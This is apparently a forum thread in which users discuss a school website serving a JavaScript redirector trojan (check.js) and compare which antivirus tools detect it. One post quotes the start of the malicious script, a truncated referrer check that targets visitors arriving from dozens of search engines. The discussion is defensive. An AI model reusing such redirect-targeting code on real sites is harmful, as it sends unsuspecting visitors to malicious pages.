Trojan in school website

I think my school is getting just a little overprotective.
http://photoserver.ws/files/qt1cdgxt1j32eovsi9si.png
Every single page/javascript is infected with a Trojan.
And some students were wondering how their conversations were being tracked...

 

Avira flags that page as containing a trojan as well. Funny, though, when I search with Firefox and search with Google Avira alerts. When I use IE7 and search with Google Avira does not alert.

 

Video http://www.youtube.com/watch?v=KEDIv7-BpBA
I can see that the infected part is a file called check.js..

 

Does anyone know why Avira would alert to that site if it comes up in a google search using Firefox but not IE7?

Also, I see that the alert from KIS says "trojan.js.redirector" and the web browser is Opera. Is that some sort of XSS? For some reason I thought Opera was somehow immune from XSS, if that what that is.

Would someone care to explain how this malware most likely works?

thanks

PS- emperordarius- thanks for the pic and youtube video.

 

There's a file called check.js in a hidden directory in the website.
It is a javascript file that probably is executed every time you access the website, and that's where the malicious script is. If someone would mind analysing the files source code...

And Opera isn't completely immune to vulnerabilities...

About the Firefox thing, maybe Firefox is vulnerable to something in the websit and Internet Explorer not? You'd better report that site to Firefox!

 

I tried to make a post on the mozilla forums but that site is down for some reason. I tried using FF and IE.

 

What happens if you go to the site using Noscript

 

Why don't you try it?

 

I'm too scared to get infected.

 

I uploaded the script to virustotal, the result is:

~VirusTotal and\or Jotti link removed per Policy....Bubba~

So you know if your av can block it...

*Please don't take this post as a comparison*

 

I ran Dr. Web's link scanner and it showed "clean". Also, Finjan shows the site as clean.

 

This file (analyzed as trojan.js.redirector.e) is not in the html page code, so it must be loaded from the server. Using IE it caches almost 1 minute after the page itself has loaded.

See:

Ravens PHP Scripts And Web Hosting Forum
http://ravenphpscripts.com/posts14928-start-0.html

Using Google searches, I could not get any redirects using Opera with scripting on and Popups allowed.

The code in the check.js file begins:

Code:

if ( (Math.random()*60 < JSS1) && document.referrer.match(/^http:\/\/([a-z0-9_\-]+\.)*
(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk
|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya
|orange|clix|terravista|gratis-ting|suomi24)\./) && document.referrer.match(/[?&]
.......

Covering many search engines!

Another victim:

http://www.speyside-developments.co.uk/anti_hacking.php

See also the link in the article to an analysis of a typical hack.

You may remember another type, the Google Sloan Tree Farm Redirect exploit, where clicking on the link from Google appended a malicious URL to the link that was clicked on, effectively taking you to a bad site.

Other reference:

http://www.scansafe.com/__data/assets/pdf_file/7584/gtr_APRIL2008.pdf

----
rich

 

So the website may have been hacked...
But I have reported many time that thing, and nothing happened.
The fact that makes me think that all this is intentional is that the students that had gone to that websites have experienced some "problems".. apparently their MSN Conversations were logged, and saved in the school's computer.

 

KIS2009 files it as a trojan containing site too...

 

And eset does Aswell trojan redirector.e but i sent the sample to symantec 2 days ago i checked with norton again still not detecting it ??

 

They send you an update once day normally, imagine when you send a sample to them...Better wait a week or two.

 

Link scanner's on site url scanner shows the site as clean. If the site is still infected the following all show clean-

Link Scanner
Dr. Web link checker
finjan

So much for those.

 

@ acr1965

The scanners you show may be missing it but my NOD32 didn't detect it , too . The reason - I couldn't access the site Perhaps the webmaster noticed something and decided to fix it

edit : Right now I can't access that site again

 

Avira Personal Premium still detects it.

 

Maybe NOD32 has automatically blocked the site? Because the website has always worked for me, always infected.
Probably yes, because I have scanned the infected javascript file with NOD32 and it did detect it as JS/Redirector.E

 

Dr.Web also detected the javascript file as Trojan.Redirect.10

 

Did you try with Dr. Web's link checker or the av program? The link checker is what I used and the site came back clean.

 

The av scanner, not the link checker. BTW I think you can try using it's link scanner (plugin for firefox, opera and IE) and scan the check.js file, it should detect it...